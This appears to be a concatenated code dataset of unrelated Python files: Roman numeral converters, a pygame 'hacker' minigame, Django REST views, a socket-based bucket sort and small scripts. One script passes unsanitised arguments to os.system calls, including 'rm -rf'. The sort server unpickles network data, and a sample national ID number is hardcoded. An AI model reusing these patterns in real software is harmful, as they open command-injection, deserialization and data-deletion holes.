        # pair (IV, IX, XL, ...), consumed as one unit.
        if i + 1 < len(roman) and to_int[roman[i]] < to_int[roman[i + 1]]:
            total += to_int[roman[i + 1]] - to_int[roman[i]]
            i += 2
        else:
            total += to_int[roman[i]]
            i += 1
    return total


roman = 'CCCXLII'
print(roman_to_int(roman))
# <<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


def int_to_roman(integer):
    """Convert a positive integer to its roman numeral string."""
    # Greedy: repeatedly take the largest symbol value that still fits.
    pieces = []
    for symbol, value in TABLE:
        while value <= integer:
            integer -= value
            pieces.append(symbol)
    return ''.join(pieces)


# Symbol/value pairs in descending order, including subtractive forms
# (CM, CD, XC, XL, IX, IV) so the greedy scan emits them directly.
TABLE = [['M', 1000], ['CM', 900], ['D', 500], ['CD', 400], ['C', 100],
         ['XC', 90], ['L', 50], ['XL', 40], ['X', 10], ['IX', 9],
         ['V', 5], ['IV', 4], ['I', 1]]

a = 342
print(int_to_roman(a))
# e.g. 342: 342 - 100 = 242 -> C, and so on down the table.
23,433 | b28b80cec7920968693a71b4e0db991e64c03187 | import Character
import pygame, random, time
from pygame.locals import *
class Hacker(Character.Character):
    """Hacker player class: a bullet-hell style minigame where the player
    shoots a wandering firewall while dodging its fireballs.

    BUG FIX: the original timed everything with ``time.clock()``, which was
    removed in Python 3.8 and, before that, measured CPU time (not wall time)
    on Unix -- breaking every timer in the game.  All timing now goes through
    a ``clock`` alias that prefers ``time.perf_counter`` and falls back to
    ``time.clock`` on ancient interpreters.
    """

    className = 'Hacker'
    goal = 'hack into the interwebs and steal digital information.'
    abilityDefinition = 'break through the opposing firewall.'
    minigameName = '1337 hax'
    abilSuccess = 'You successfully hack your target.'
    abilLoss = 'You fail to hack your target.'
    gamePoints = 0
    playerNumber = -1
    timeLimit = 50  # time limit for the minigame, feel free to change as needed.
    image = 'Hacker.png'

    def minigame(self, window, t):
        """Run the firewall minigame; ``t`` is the end-screen countdown length."""
        # Wall-clock timer; backward compatible with interpreters lacking
        # perf_counter (Python 2) where time.clock was still available.
        clock = getattr(time, "perf_counter", None) or time.clock
        minigameWon = False
        minigameLost = False
        startTime = clock()
        pygame.init()
        window = pygame.display.set_mode((1200, 800))
        pygame.display.set_caption('Firewall fight')
        # Palette (gray/red currently unused but kept for tweaking).
        white = [255, 255, 255]
        gray = [130, 130, 130]
        black = [0, 0, 0]
        rd = [255, 0, 0]
        red = [255, 100, 0]
        green = [0, 255, 0]
        blue = [0, 0, 255]
        # Firewall rectangle: centre position and size.
        wall = [600, 200]
        fwW = 300
        fwH = 150
        dFw = []          # firewall velocity [dx, dy]
        fwAtt = []        # live fireballs: [x, y, dx, dy]
        player = [600, 615]
        attackTime = 0    # earliest time the player may shoot again
        fwDMove = 0       # next time to re-roll the firewall's direction
        fwMoveTime = 0    # next time to step the firewall
        fwTime = clock() + 1      # next fireball spawn
        fwAttTime = clock() + 1   # next fireball movement tick
        fwGval = 0        # firewall green channel (randomised per redraw)
        attacks = []      # player shots as (x, y) points
        attTi = clock() + .02     # next shot movement tick
        lines = []        # decorative "static" lines on the firewall
        nextTime = False
        for i in range(16):
            lines.append([0, 0, 0, 0, 255, 0, 0])
        hp = 24           # firewall hit points
        tP = 0            # movement throttle timestamp
        ended = False
        lIsPressed = False
        rIsPressed = False
        spHeld = False
        while not minigameWon and not minigameLost:
            events = pygame.event.get()
            for event in events:
                if event.type == QUIT:
                    ended = True
                    break
                if event.type == KEYUP:
                    if event.key == K_LEFT:
                        lIsPressed = False
                    if event.key == K_RIGHT:
                        rIsPressed = False
                    if event.key == K_SPACE:
                        spHeld = False
                        tP = 0
                if event.type == KEYDOWN:
                    if event.key == K_LEFT:
                        lIsPressed = True
                    if event.key == K_RIGHT:
                        rIsPressed = True
                    if event.key == K_SPACE:
                        spHeld = True
                        # Fire immediately on press, rate-limited to one
                        # shot per 0.7s.
                        if attackTime < clock():
                            attacks.append((player[0], player[1] - 25))
                            attackTime = clock() + .7
                            tP = clock()
            # Holding space keeps firing at the same rate limit.
            if spHeld:
                if attackTime < clock():
                    attackTime = clock() + .7
                    attacks.append((player[0], player[1] - 20))
            # Movement is throttled to one 5px step per 0.05s.
            if tP < clock():
                tP = clock() + .05
                if rIsPressed:
                    player[0] += 5
                if lIsPressed:
                    player[0] -= 5
            # Every 8 seconds pick a new random firewall direction;
            # faster/larger steps after 35s of play.
            if fwDMove < clock():
                fwDMove = clock() + 8
                xVal = 8
                yVal = 6
                minVal = 3
                if clock() > startTime + 35:
                    xVal = 12
                    yVal = 10
                    minVal = 6
                dx = random.randint(-xVal, xVal)
                dy = random.randint(-yVal, yVal)
                while abs(dx) < minVal:
                    dx = random.randint(-xVal, xVal)
                while abs(dy) < minVal:
                    dy = random.randint(-yVal, yVal)
                dFw = [dx, dy]
            # Step the firewall every 0.03s, bouncing off the arena edges.
            if fwMoveTime < clock():
                fwMoveTime = clock() + .03
                wall = [wall[0] + dFw[0], wall[1] + dFw[1]]
                if wall[0] <= fwW / 2:
                    wall[0] = fwW / 2
                    dFw[0] = -dFw[0]
                if wall[0] >= 1200 - fwW / 2:
                    wall[0] = 1200 - fwW / 2
                    dFw[0] = -dFw[0]
                if wall[1] >= 400 - fwH / 2:
                    wall[1] = 400 - fwH / 2
                    dFw[1] = -dFw[1]
                if wall[1] <= 60 + fwH / 2:
                    wall[1] = 60 + fwH / 2
                    dFw[1] = -dFw[1]
                if nextTime:
                    # NOTE(review): only lines[i] (the last index left over
                    # from a previous loop) is shifted here; shifting every
                    # line was probably intended -- confirm before changing.
                    lines[i][0] = lines[i][0] + dFw[0]
                    lines[i][1] = lines[i][1] + dFw[1]
                    lines[i][2] = lines[i][2] + dFw[0]
                    lines[i][3] = lines[i][3] + dFw[1]
                    nextTime = not nextTime
                else:
                    # Re-randomise the static lines and firewall tint.
                    for i in range(len(lines)):
                        fwGval = random.randint(20, 120)
                        fwBval = random.randint(0, 20)
                        lines[i][0] = random.randint(wall[0] - 10 - fwW / 2, wall[0] + 10 + fwW / 2)
                        lines[i][1] = random.randint(wall[1] - 10 - fwH / 2, wall[1] + 10 + fwH / 2)
                        lines[i][2] = random.randint(wall[0] - 10 - fwW / 2, wall[0] + 10 + fwW / 2)
                        lines[i][3] = random.randint(wall[1] - 10 - fwH / 2, wall[1] + 10 + fwH / 2)
                        lines[i][5] = random.randint(0, 100)
                        lines[i][6] = random.randint(0, 30)
                    nextTime = not nextTime
            # Spawn rate of fireballs; ramps up at 20s and 35s.
            if fwTime < clock():
                x = .5
                if clock() > startTime + 20:
                    x = .4
                if clock() > startTime + 35:
                    x = .3
                fwTime = clock() + x
                spawnY = wall[1] + (fwH / 2) + 5
                # Aim roughly at the player with slight random spread.
                attDX = (player[0] - wall[0]) // random.randint(64, 72)
                attDY = (player[1] - spawnY) // random.randint(64, 72)
                fwAtt.append([wall[0], spawnY, int(attDX), int(attDY)])
            # Clamp the player inside the arena.
            if player[0] <= 5:
                player[0] = 5
            if player[0] >= 1195:
                player[0] = 1195
            window.fill(black)
            # Move speed of fireballs; ramps up at 20s and 35s.
            if fwAttTime < clock():
                x = .04
                if clock() > startTime + 20:
                    x = .03
                if clock() > startTime + 35:
                    x = .02
                fwAttTime = clock() + x
                # Cull at most one off-screen fireball per tick.
                for i in range(len(fwAtt)):
                    if fwAtt[i][1] > 800:
                        del fwAtt[i]
                        break
                for i in range(len(fwAtt)):
                    fwAtt[i][0] = fwAtt[i][0] + fwAtt[i][2]
                    fwAtt[i][1] = fwAtt[i][1] + fwAtt[i][3]
                    # Fireball/player collision box: 16 x 20 px.
                    if fwAtt[i][0] >= player[0] - 8 and fwAtt[i][0] <= player[0] + 8 and fwAtt[i][1] >= player[1] - 10 and fwAtt[i][1] <= player[1] + 10:
                        minigameLost = True
            # Move the player's shots every 0.03s.
            if clock() > attTi:
                attTi = clock() + .03
                for i in range(len(attacks)):
                    if attacks[i][1] < 60:
                        del attacks[i]
                        break
                for i in range(len(attacks)):
                    attacks[i] = (attacks[i][0], attacks[i][1] - 5)
                    # A shot inside the firewall rectangle costs it 1 hp.
                    if attacks[i][1] <= wall[1] + fwH / 2 and attacks[i][1] >= wall[1] - fwH and attacks[i][0] >= wall[0] - fwW / 2 and attacks[i][0] <= wall[0] + fwW / 2:
                        hp -= 1
                        del attacks[i]
                        break
            # --- drawing ---
            for i in range(len(attacks)):
                pygame.draw.circle(window, blue, attacks[i], 5)
            for i in range(len(fwAtt)):
                pygame.draw.circle(window, rd, (int(fwAtt[i][0]), int(fwAtt[i][1])), 3)
                pygame.draw.line(window, rd, (fwAtt[i][0], fwAtt[i][1]), (fwAtt[i][0] - 2 * fwAtt[i][2], fwAtt[i][1] - 3 * fwAtt[i][3]), 3)
            # Health bar along the top edge.
            pygame.draw.rect(window, rd, (0, 0, 1200, 60))
            pygame.draw.rect(window, green, (0, 0, hp * (1200 / 24), 60))
            # Player ship (triangle).
            pygame.draw.polygon(window, white, ((player[0], player[1] - 15), (player[0] - 10, player[1] + 10), (player[0] + 10, player[1] + 10)), 0)
            pygame.draw.rect(window, (255, fwGval, fwBval), (wall[0] - fwW / 2, wall[1] - fwH / 2, fwW, fwH))
            for i in range(len(lines)):
                pygame.draw.line(window, (lines[i][4], lines[i][5], lines[i][6]), (lines[i][0], lines[i][1]), (lines[i][2], lines[i][3]), random.randint(1, 5))
            font = pygame.font.Font(None, 28)
            text = font.render(str(int(self.timeLimit + startTime - clock())), 1, black)
            txt = font.render('Use the arrowkeys to move and the spacebar to fire.', 1, black)
            window.blit(txt, (8, 8))
            window.blit(text, (1165, 8))
            pygame.display.update()
            if hp == 0:
                minigameWon = True
            if clock() - startTime >= self.timeLimit:
                minigameLost = True
            if ended:
                pygame.display.quit()
                break
        if minigameWon or minigameLost:
            self.showEndScreen(window, minigameWon, t)

    def showRules(self, window, t=5):
        """Show the objective and a t-second countdown, then start the minigame."""
        pygame.init()
        for i in range(t):
            window = pygame.display.set_mode([1200, 800])
            pygame.display.set_caption("")
            window.fill([0, 0, 0])
            font = pygame.font.Font(None, 36)
            goal = 'Your objective is to ' + self.getAbilityDefinition()
            text1 = font.render(goal, 1, (255, 255, 255))
            countdown = font.render('Minigame starting in: ' + str(t - i), 1, (255, 255, 255))
            window.blit(text1, (8, 8))
            window.blit(countdown, (8, 100))
            pygame.display.update()
            time.sleep(1)
        self.minigame(window, t)

    def showEndScreen(self, window, hasWon, t):
        """Display the win/loss message with a t-second return countdown."""
        self.won = hasWon
        if hasWon:
            words = self.getMinigameWinText()
        else:
            words = self.getMinigameLossText()
        for i in range(t):
            window = pygame.display.set_mode([1200, 800])
            pygame.display.set_caption("")
            window.fill((0, 0, 0))
            font = pygame.font.Font(None, 36)
            text = font.render(words, 1, (255, 255, 255))
            countdown = font.render('Returning to the main game in: ' + str(t - i), 1, (255, 255, 255))
            window.blit(text, (8, 8))
            window.blit(countdown, (8, 100))
            pygame.display.update()
            time.sleep(1)
#b = pygame.display.set_mode([1,1])
#a = Hacker(1)
#a.showRules(b) |
# Korean-style personal identification number: YYMMDD-GNNNNNN.
pin = "881120-1068234"
splitted = pin.split("-")
yyyymmdd = splitted[0]
num = splitted[1]
print(yyyymmdd)
print(num)
# First digit of the suffix encodes gender: "1" male, "2" female.
genderNum = num[0]


def decideGender(num):
    """Print and return 'male'/'female' for a gender digit; None otherwise.

    BUG FIX: the original ignored its ``num`` parameter and read the global
    ``genderNum`` instead, so the argument had no effect.
    """
    gender = None
    if num == "1":
        gender = 'male'
    elif num == "2":
        gender = 'female'
    if gender is not None:
        print(gender)
    return gender


decideGender(genderNum)
23,435 | fd6e68e6c1f5e43830d1eb27d1286a28edc6ab19 | # coding=utf-8
import json
import sys
import subprocess
from django.http import JsonResponse
from django.core.exceptions import ImproperlyConfigured
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ViewDoesNotExist, ObjectDoesNotExist
from django_filters.rest_framework import DjangoFilterBackend
from rest_framework import filters, permissions
from rest_framework.response import Response
from rest_framework.decorators import detail_route, list_route
from rest_framework.views import APIView
from rest_framework.viewsets import ModelViewSet
from rest_framework_extensions.mixins import PaginateByMaxMixin
from rest_framework.generics import ListCreateAPIView, RetrieveUpdateDestroyAPIView, GenericAPIView
from .filters import (AjaxDatatableOrderingFilter,
AjaxDatatablePagination,
AjaxDatatableSearchFilter,
pk_in_filter_factory)
def get_app_model_name(kwargs):
    """Extract the (app_name, model_name) pair from view kwargs, lower-cased."""
    app = kwargs.get('app_name').lower()
    model = kwargs.get('model_name').lower()
    return app, model
def get_model_content_type(app_name, model_name):
    """Resolve a ContentType for (app_name, model_name).

    Raises ViewDoesNotExist when no such model is registered.
    """
    try:
        content_type = ContentType.objects.get(app_label=app_name, model=model_name)
    except ObjectDoesNotExist:
        raise ViewDoesNotExist('No model found.')
    return content_type
class ContentTypeObjectView(GenericAPIView):
    """Generic API view that resolves its model (and serializer) at request
    time from the ``app_name``/``model_name`` URL kwargs via the ContentType
    framework, unless ``model`` is set explicitly on the subclass."""

    model = None

    @property
    def app_name(self):
        # Django app label of the resolved model.
        if self.model:
            return self.model._meta.app_label
        else:
            # NOTE(review): raised without a message, unlike model_name below.
            raise ViewDoesNotExist

    @property
    def model_name(self):
        # Lower-case model name of the resolved model.
        if self.model:
            return self.model._meta.model_name
        else:
            raise ViewDoesNotExist('No model found.')

    def get_model(self):
        # Lazily resolve self.model from the URL kwargs (lower-cased).
        if not self.model:
            app_name = self.kwargs.get('app_name').lower()
            model_name = self.kwargs.get('model_name').lower()
            try:
                model_content_type = ContentType.objects.get(app_label=app_name, model=model_name)
            except ObjectDoesNotExist:
                raise ViewDoesNotExist
            self.model = model_content_type.model_class()

    def get_serializer_class(self):
        # Convention: <Model>Serializer living in core.<app>.serializers,
        # falling back to apps.<app>.serializers.  The module must already be
        # imported -- this looks it up in sys.modules, it does not import it.
        if getattr(self, 'serializer_class', None):
            return self.serializer_class
        self.get_model()
        serialize_name = self.model.__name__ + 'Serializer'
        module_str = 'core.%s.serializers' % self.app_name
        if module_str not in sys.modules:
            module_str = 'apps.%s.serializers' % self.app_name
        serializer_module = sys.modules[module_str]
        self.serializer_class = getattr(serializer_module, serialize_name)
        return self.serializer_class

    def get_queryset(self):
        # Resolve model + serializer, expose the model's declared filter and
        # search fields, then let Model.Config.filter_queryset (if defined)
        # narrow the base queryset for this request.
        self.get_model()
        self.serializer_class = self.get_serializer_class()
        self.queryset = self.model.objects.all()
        self.filter_fields = getattr(self.model.Config, 'filter_fields', ())
        self.search_fields = getattr(self.model.Config, 'search_fields', ())
        q = super(ContentTypeObjectView, self).get_queryset()
        if hasattr(self.model.Config, 'filter_queryset'):
            q = self.model.Config.filter_queryset(self.request, q)
        return q
class CommonListCreateAPIView(ListCreateAPIView, ContentTypeObjectView):
    """List/create endpoint for any content-type-resolved model, with
    filter, search and ordering support."""

    filter_backends = (DjangoFilterBackend,
                       filters.SearchFilter,
                       filters.OrderingFilter)

    def get(self, request, *args, **kwargs):
        return self.list(request, *args, **kwargs)

    def post(self, request, *args, **kwargs):
        return self.create(request, *args, **kwargs)
class CommonRetrieveUpdateAPIView(RetrieveUpdateDestroyAPIView, ContentTypeObjectView):
    """Retrieve/update/destroy endpoint for any content-type-resolved model."""

    def get(self, request, *args, **kwargs):
        return self.retrieve(request, *args, **kwargs)

    def put(self, request, *args, **kwargs):
        # Full update: all writable fields required.
        return self.update(request, *args, **kwargs)

    def patch(self, request, *args, **kwargs):
        # Partial update: only supplied fields are changed.
        return self.partial_update(request, *args, **kwargs)

    def delete(self, request, *args, **kwargs):
        return self.destroy(request, *args, **kwargs)
class AjaxDatableView(object):
    """Mixin providing ``status`` and ``page`` endpoints for ajax-mode
    jquery dataTables; mix into a DRF viewset that defines ``list``."""

    def get_model(self):
        """Resolve the model from ``queryset`` or an explicit ``model`` attr."""
        if hasattr(self, 'queryset'):
            return getattr(self, 'queryset').model
        elif hasattr(self, 'model'):
            return getattr(self, 'model')
        else:
            raise ImproperlyConfigured('Can\'t get model for viewset')

    @list_route()
    def status(self, request, *args, **kwargs):
        """List rows restricted to a pk__in filter (used for status polling)."""
        self.filter_class = pk_in_filter_factory(self.get_model())
        # BUG FIX: super(...).list is already bound, so the original
        # ``.list(self, request, ...)`` passed ``self`` twice, shifting every
        # argument by one (the real request landed in *args).
        return super(AjaxDatableView, self).list(request, *args, **kwargs)

    @list_route()
    def page(self, request, *args, **kwargs):
        """Pagination endpoint for an ajax-mode dataTable."""
        self.pagination_class = AjaxDatatablePagination
        # dataTable drives ordering/search through its own query params.
        self.filter_backends = getattr(self, 'filter_backends', []) + [AjaxDatatableOrderingFilter,
                                                                       AjaxDatatableSearchFilter]
        queryset = self.get_queryset()
        records_total = queryset.count()  # total before filtering
        queryset = self.filter_queryset(queryset)
        records_filtered_total = queryset.count()  # total after filtering
        page = self.paginate_queryset(queryset)
        if page is not None:
            serializer = self.get_serializer(page, many=True)
        else:
            serializer = self.get_serializer(queryset, many=True)
        # Response shape expected by jquery.dataTables' ajax protocol.
        result = {
            "draw": request.query_params.get('draw', 0),
            "recordsTotal": records_total,
            "recordsFiltered": records_filtered_total,
            "data": serializer.data,
            "error": ""
        }
        return Response(result)
class CommonViewSet(PaginateByMaxMixin, ModelViewSet):
    """Provide list/retrieve/patch/delete restful api for a model."""

    max_paginate_by = 200
    filter_backends = (DjangoFilterBackend,
                       filters.SearchFilter,
                       filters.OrderingFilter)

    # subclass implement below to specify permission for actions
    # permissions_map = {
    #     'retrieve': [CommonAPIPermissions],
    #     'create': [CommonAPIPermissions],
    #     'list': [CommonAPIPermissions],
    #     'update': [CommonAPIPermissions],
    #     'delete': [CommonAPIPermissions],  # customized action below
    #     'destroy': [CommonAPIPermissions],
    # }

    def get_permissions(self):
        """Pick permission classes per action from ``permissions_map``.

        BUG FIX: membership was tested with ``self.action.lower()`` but the
        map was indexed with the raw ``self.action``, raising KeyError for
        mixed-case action names; both now use the lower-cased key.
        """
        if hasattr(self, 'permissions_map'):
            action = self.action.lower()
            if action in self.permissions_map:
                self.permission_classes = self.permissions_map[action]
        return super(CommonViewSet, self).get_permissions()

    @list_route(methods=['post', 'delete'])
    def delete(self, request, pk=None):
        """Batch delete: POST 'pk' as a comma-separated id list."""
        pk = request.POST.get('pk')
        # Guard a missing 'pk' parameter (previously AttributeError -> 500).
        if not pk:
            return Response({'detail': 'Object not found, or permission denied.'}, status=404)
        pk = pk.split(',')
        queryset = self.filter_queryset(self.get_queryset())
        queryset = queryset.filter(pk__in=pk)
        if queryset.count():
            queryset.delete()
        else:
            data = {'detail': 'Object not found, or permission denied.'}
            return Response(data, status=404)
        return JsonResponse({'success': True}, status=200)

    @list_route(methods=['post', 'get'])
    def page(self, request):
        """Pagination api for jquery.dataTable -- not implemented here;
        see AjaxDatableView.page for a working implementation."""
        draw = request.GET.get('draw', 0)
        length = int(request.GET.get('length', 5))
        start = int(request.GET.get('start', 0))
        order_column = int(request.GET.get('order[0][column]', 0))
        order_direction = request.GET.get('order[0][dir]', 'asc')
        search_keyword = request.GET.get('search[value]', '')
        raise NotImplementedError
class GitCommitInfoView(APIView):
    """Expose the current git HEAD commit (hash, date, message) as JSON."""

    permission_classes = (permissions.AllowAny,)

    def get(self, request, *args, **kwargs):
        # ``git show -s`` prints only the commit header; the --format string
        # emits a JSON object wrapped in single quotes, which we strip below.
        raw = subprocess.check_output(
            ['git', 'show', '-s', '--date=iso8601', '--format=\'{"commit": "%h", "date": "%ad", "comment": "%s"}\''])
        payload = raw.decode("utf-8").strip().strip('\'')
        return Response(json.loads(payload))
|
23,436 | 14c7b8d0c4378689215fb0597940cb7cb6055148 | import numpy as np
class BaseLoader:
    """Parse a whitespace/line-oriented input file.

    Opens *filename*, runs :meth:`parse` (a hook for subclasses to override)
    and closes the file again - even when parsing fails.
    """

    def __init__(self, filename):
        self.file = open(filename, "r")
        try:
            self.parse()
        finally:
            # Bug fix: the file handle previously leaked when parse() raised.
            self.close()

    def _readline(self):
        # Next line without its trailing newline.
        return self.file.readline().rstrip('\n')

    def _readlines(self, n):
        # Next n raw lines.
        return [self._readline() for _ in range(n)]

    def _readlinesAndSplit(self, n):
        # Next n lines, each split on whitespace.
        return [self._readline().split() for _ in range(n)]

    def _loadIntegers(self):
        # One line parsed as a list of ints.
        return [int(tok) for tok in self._readline().split()]

    def _loadIntegerMatrix(self, n):
        # Next n lines parsed as rows of ints.
        return [self._loadIntegers() for _ in range(n)]

    def _toNumpyArray(self, data, dtype=str):
        # Convenience wrapper; dtype defaults to str for mixed text fields.
        return np.array(data, dtype=dtype)

    def parse(self):
        """Hook for subclasses; called exactly once from __init__."""
        pass

    def close(self):
        self.file.close()
class Loader(BaseLoader):
    """Concrete loader for the slideshow input format."""

    def parse(self):
        # First line holds N; the next N lines form an integer matrix.
        header = self._loadIntegers()
        self.N = header[0]
        # self.photos = self._readlinesAndSplit(self.N)
        self.matrix = self._loadIntegerMatrix(self.N)
        # self.photos = self._toNumpyArray(self.photos, [('type', str), ('tag_count', int), ('tags', list)])
class Writer:
    """Write slideshow results to an output file, one record per line."""

    def __init__(self, filename):
        self.file = open(filename, "w+")

    def writeSlidesLength(self, length):
        # A single line holding the slide count.
        self.file.write("{0}\n".format(length))

    def writeVerticalsAndHorizontals(self, verticals, horizontals):
        # Vertical slides: two photo ids per line; horizontals: one id per line.
        for pair in verticals:
            self.file.write("{0} {1}\n".format(pair[0], pair[1]))
        for photo in horizontals:
            self.file.write("{0}\n".format(photo))

    def close(self):
        self.file.close()
if __name__ == '__main__':
    # Smoke test: parse the example input file shipped with the problem set.
    example = Loader("files/a_example.in")
    # print(example.photos)
|
23,437 | 6349032661bd87fee2b6c63351ee54db4ef98c03 | import os
import numpy as np
import argparse
if __name__ == "__main__":
    # Build the NEW_<topology> dataset layout (TRAIN / EVALUATE / ALL, each
    # with a TM/ sub-directory) from an existing results_zoo topology and its
    # traffic-matrix (.demands) files.
    # python convert_dataset.py -d results_single_top -name Garr199905
    parser = argparse.ArgumentParser(description='Parse file and create plots')
    parser.add_argument('-f1', help='File where the topologies are stored', type=str, required=True, nargs='+')
    parser.add_argument('-name', help='Topology name', type=str, required=True, nargs='+')
    args = parser.parse_args()
    data_dir = args.f1[0]
    topology_name = args.name[0]
    # Destination directory tree; any previous run is wiped first.
    new_dir = "../Enero_datasets/dataset_sing_top/data/"+data_dir+"/NEW_"+topology_name+'/'
    new_dir_train = new_dir+"TRAIN"
    new_dir_eval = new_dir+"EVALUATE"
    new_dir_all = new_dir+"ALL"
    new_dir_TM_train = new_dir_train+"/TM/"
    new_dir_TM_eval = new_dir_eval+"/TM/"
    new_dir_TM_all = new_dir_all+"/TM/"
    if not os.path.exists(new_dir):
        os.makedirs(new_dir)
    else:
        os.system("rm -rf %s" % (new_dir))
        os.makedirs(new_dir)
    os.makedirs(new_dir_train)
    os.makedirs(new_dir_eval)
    os.makedirs(new_dir_all)
    os.makedirs(new_dir_TM_train)
    os.makedirs(new_dir_TM_eval)
    os.makedirs(new_dir_TM_all)
    # Copy the topology graph into all three splits.
    # aux_top_name = "./data/"+data_dir+"/"+topology_name+"/graph_"+topology_name+".txt"
    aux_top_name = "../Enero_datasets/results-1-link_capacity-unif-05-1/results_zoo/"+topology_name+"/"+topology_name+".graph"
    os.system("cp %s %s.graph" % (aux_top_name, new_dir_train+'/'+topology_name))
    os.system("cp %s %s.graph" % (aux_top_name, new_dir_eval+'/'+topology_name))
    os.system("cp %s %s.graph" % (aux_top_name, new_dir_all+'/'+topology_name))
    # Per-split counters used to number the copied .demands files.
    num_TMs_train = 0
    nums_TMs_eval = 0
    nums_TMs_all = 0
    for subdir, dirs, files in os.walk("../Enero_datasets/results-1-link_capacity-unif-05-1/results_zoo/"+topology_name+"/TM/"):
        for file in files:
            #if file.startswith('TM-'):
            if file.endswith('.demands'):
                dst_dir = new_dir_TM_eval
                tm_iter = nums_TMs_eval
                # Compute handcrafted 70% of the total samples
                # NOTE(review): the split is actually a fixed cap of 100 TRAIN
                # samples, not 70% of the total - confirm which is intended.
                if num_TMs_train<100:
                    dst_dir = new_dir_TM_train
                    tm_iter = num_TMs_train
                os.system("cp %s %s.%s.demands" % (subdir+'/'+file, dst_dir+'/'+topology_name, tm_iter))
                if num_TMs_train<100:
                    num_TMs_train += 1
                else:
                    nums_TMs_eval += 1
                # Every sample is additionally copied into ALL.
                dst_dir = new_dir_TM_all
                tm_iter = nums_TMs_all
                os.system("cp %s %s.%s.demands" % (subdir+'/'+file, dst_dir+'/'+topology_name, tm_iter))
                nums_TMs_all += 1
|
23,438 | efaa58e2f87264c14ee9ad63eba7828960b7c3d1 | import socket
import pickle
import threading
import sys
import random
import functools
import reliable
import time
import quickLast
def server(HOST, PORT):
    """Accept one connection, sort the received pickled list and send it back.

    Uses the project-local ``reliable`` framing helpers and the ``quickLast``
    quicksort. Handles exactly one client, then returns.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Bug fix: SO_REUSEADDR must be set *before* bind() to have any effect;
    # it was previously set after accept(), where it did nothing.
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind((HOST, PORT))
    s.listen(1)
    print("waiting accept")
    conn, addr = s.accept()
    print("waiting for receive")
    # NOTE(review): pickle.loads on network data is unsafe with untrusted
    # peers; acceptable here only because client and server are the same app.
    myobject = pickle.loads(reliable.receive(conn))
    quickLast.quickSort(myobject, 0, len(myobject)-1)
    reliable.send(conn, myobject)
    # Bug fix: ``conn.close`` was referenced but never called, leaking the
    # connection; the listening socket is now closed as well.
    conn.close()
    s.close()
def argmin(values):
    """Return the index of the smallest element of *values* (first on ties)."""
    smallest_idx, _ = min(enumerate(values), key=lambda pair: pair[1])
    return smallest_idx
def merge(src_list):
    """K-way merge of already-sorted lists into one sorted list.

    *src_list* is consumed destructively: inner lists are emptied and removed
    as the merge proceeds (same contract as the original implementation).

    Improvements: the min-index computation is done inline over the current
    heads instead of materialising a throwaway list of first elements on
    every pass (and instead of relying on the sibling ``argmin`` helper).
    ``list.pop(0)`` remains O(k) per element, which is fine at these sizes.
    """
    result = []
    while src_list:
        # Index of the sub-list whose current head is smallest (first on ties).
        min_indx = min(range(len(src_list)), key=lambda i: src_list[i][0])
        arr = src_list[min_indx]          # reference, so pops mutate in place
        result.append(arr.pop(0))
        if not arr:                       # exhausted sub-list: drop it
            src_list.pop(min_indx)
    return result
def chunks(lst, n):
    """Yield successive n-sized slices of *lst*; the last may be shorter."""
    for start in range(0, len(lst), n):
        end = start + n
        yield lst[start:end]
def client(HOST, PORT, arr, result, i):
    '''Send one partition of the original list to the sorting server and
    store the sorted reply at result[i].'''
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST, PORT))
    # Framed send/receive via the project-local ``reliable`` helpers.
    reliable.send(s, arr)
    # NOTE(review): pickle.loads on network data is only safe because the
    # peer is our own server() running in the same process.
    res = pickle.loads(reliable.receive(s))
    #print(res)
    result[i] = res
    s.close()
# Distributed bucket sort: one server thread per bucket sorts its partition,
# then the sorted partitions are k-way merged in the main thread.
n_threads = int(input("How many buckets do you want to use? "))
result_array = [None] * n_threads #it creates a list of n elemens of none it helps to save all buckets array
rand_arr = [random.randint(0, 999) for i in range(3500)] #it creates an array with 3500 random elements
# NOTE(review): int(3500 / n_threads) truncates, so chunks() can yield MORE
# than n_threads partitions; any extra partition is never sent to a server
# and is silently missing from the merge - confirm n_threads divides 3500.
partition = list(chunks(rand_arr, int(len(rand_arr) / n_threads)))
HOST = "localhost"
PORT = 50007
# start the servers for listening the requests
servers = [threading.Thread(target=server, args=(HOST, PORT + i)) for i in range(n_threads)]
for t in servers: t.start()
clients = [threading.Thread(target=client, args=(HOST, PORT + i, partition[i], result_array, i))
            for i in range(n_threads)]
for t in clients: t.start()
for t in clients: t.join()
sorted_arr = merge(result_array)
print(sorted_arr)
for t in servers: t.join()
|
23,439 | 9f4c0569bc50d60bb97c1b2f6fc378cb68a40013 | # -*- coding: utf-8 -*-
import pandas as pd
# Three aligned Series that become the ROWS of the DataFrame below
# (their ``name`` attributes become the DataFrame index).
A = pd.Series([1,2,3],index=[1,2,3],name="A")
B = pd.Series([10,20,30],index=[1,2,3],name="B")
C = pd.Series([100,200,300],index=[1,2,3],name="C")
#D = pd.DataFrame({A.name:A,B.name:B,C.name:C},index=[1,2,3])
D = pd.DataFrame([A,B,C])
# NOTE(review): hard-coded Windows path; to_excel needs openpyxl installed.
D.to_excel("C:/Temp/output.xlsx")
print("done!") |
23,440 | cdb49fa8744241885bd78039fc7a9044f447aeff | a=int(input("Ingrese Numero 1:"))
b=int(input("Ingrese Numero 2:"))
c=int(input("Ingrese Numero 3:"))
def max_de_tres(A, B, C):
    """Print which of the three values is the largest; returns None.

    Bug fix: the original used strict comparisons, so ties (e.g. A == B == 5,
    C == 1) fell through every branch and wrongly reported C as the maximum.
    With >= the first of any tied maximum values is reported.
    """
    if A >= B and A >= C:
        print("El numero mayor es el primer valor " + str(A))
    elif B >= A and B >= C:
        print("El numero mayor es el segundo valor " + str(B))
    else:
        print("El numero mayor es el tercer valor " + str(C))
print max_de_tres(a,b,c) |
23,441 | 03a4d957800b6393e83ef560c1b155481e855343 | from abc import ABC
from .abstract_data_access_layer import AbstractDataAccessLayer
class BaseApi(ABC):
    """Abstract base for admin-facing API classes.

    Holds the acting user's id, the data-access layer and a logger for use
    by concrete subclasses.
    """

    def __init__(
        self, user_id: int, data_access_layer: AbstractDataAccessLayer, logger
    ) -> None:
        """
        Store the collaborators used by concrete API subclasses.

        Args:
            user_id: id of the (already validated) admin user.
            data_access_layer: an implementation of AbstractDataAccessLayer
